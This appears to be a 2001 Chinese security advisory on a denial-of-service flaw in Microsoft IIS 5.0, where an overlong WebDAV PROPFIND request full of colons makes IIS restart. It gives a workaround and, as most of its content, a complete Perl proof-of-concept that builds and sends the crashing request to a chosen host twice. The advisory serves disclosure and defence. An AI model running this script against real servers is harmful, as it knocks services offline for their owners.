PROPFIND请求可导致IIS 5.0拒绝服务
发布日期:2001-05-12
更新日期:2001-05-12
受影响系统:
Microsoft IIS 5.0
描述:
特殊构造的请求可以从远程重启IIS相关的所有服务。如果重复发送这样的请求将会严重影响IIS的性能。这个特殊构造的请求是一个包含许多“:”字符的超长但有效的propfind请求。
<* 来源:Georgi Guninski (
guninski@guninski.com)*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Georgi Guninski (
guninski@guninski.com) 给出如下演示程序:
--vv9.pl-------------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "Written by Georgi Guninski wait some time\n";
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
$over=":" x $ll ; # the ":" is the most important
$ch=pack("C",65); # just to check whether potentail payload is possible - yes
$tmp = $ch x 64;
$over= $ch x 4 . $over . $tmp;
$over1=":" x $ll; #not sure about this
$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over1".':">';
$xml=$xml.'<a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
$l=length($xml);
$req="PROPFIND / HTTP/1\.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,200);
print $res;
close $socket;
}
do vv(59060);
#this is overflow, repeat several times - 49060 seems the smallest #, may need to change
sleep(1);
do vv(59060);
---------------------------------------------------------------------------
建议:
临时解决办法:
禁止WebDAV扩展。
厂商补丁:
暂无。
浏览次数:3972
严重程度:0(网友投票)